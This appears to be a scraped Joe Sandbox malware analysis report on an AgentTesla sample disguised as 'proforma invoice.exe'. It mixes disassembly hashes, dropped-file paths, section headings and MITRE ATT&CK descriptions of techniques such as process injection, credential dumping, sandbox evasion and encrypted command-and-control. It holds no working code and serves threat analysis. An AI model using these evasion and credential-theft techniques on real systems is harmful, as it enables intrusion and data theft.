Instruction Fuzzy Hash: A8B0223BF880208BCA000280F8002FCB330EB8022AF0002B2C22A8088083288A3A8282

Function 02B2A1B1 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2580384729.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b20000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be5895c03f3447a71ebfe80a0c356d2587e4fdf4d7fff0866746d866788c1a06
Instruction ID: f5fb0f7b7b9375e485c32b85650d6add2a9b79bad5208efcbfa667f1edb74354
Opcode Fuzzy Hash: be5895c03f3447a71ebfe80a0c356d2587e4fdf4d7fff0866746d866788c1a06
Instruction Fuzzy Hash: 83C08C2080E2E04EDB03A720C42C1883F226B03304B1840F5D290CE09AC610885BC311

Function 02B21740 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2580384729.0000000002B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2b20000_CGWlZD.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dcb02eb1e0497ef526569afcbb9ca212719ecbeb0b63ac07c19d7eb9e3ca5ff
Instruction ID: af8c7d5d20a8da129f78ac4d2694c681a9432242a9f9ae545d830b7d080f5880
Opcode Fuzzy Hash: 6dcb02eb1e0497ef526569afcbb9ca212719ecbeb0b63ac07c19d7eb9e3ca5ff
Instruction Fuzzy Hash: 64B092BCCC42088F8381AF6AB01A31A3BECAA84620380AA669C0D82701D63010348F6C

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report proforma invoice.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pv35m4h.yn0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3vkkigcc.cq2.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ccx4dkv2.dgt.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cm2cvgql.1nf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hl5dwkwo.kqf.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv0mtdfd.145.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m4ddlut4.a13.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgsxzusf.uej.psm1

C:\Users\user\AppData\Local\Temp\tmp4844.tmp

C:\Users\user\AppData\Local\Temp\tmp6458.tmp

C:\Users\user\AppData\Roaming\CGWlZD.exe

C:\Users\user\AppData\Roaming\CGWlZD.exe:Zone.Identifier

Windows Analysis Report
proforma invoice.exe

Function 00AD33A8 Relevance: 1.6, Strings: 1, Instructions: 376
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre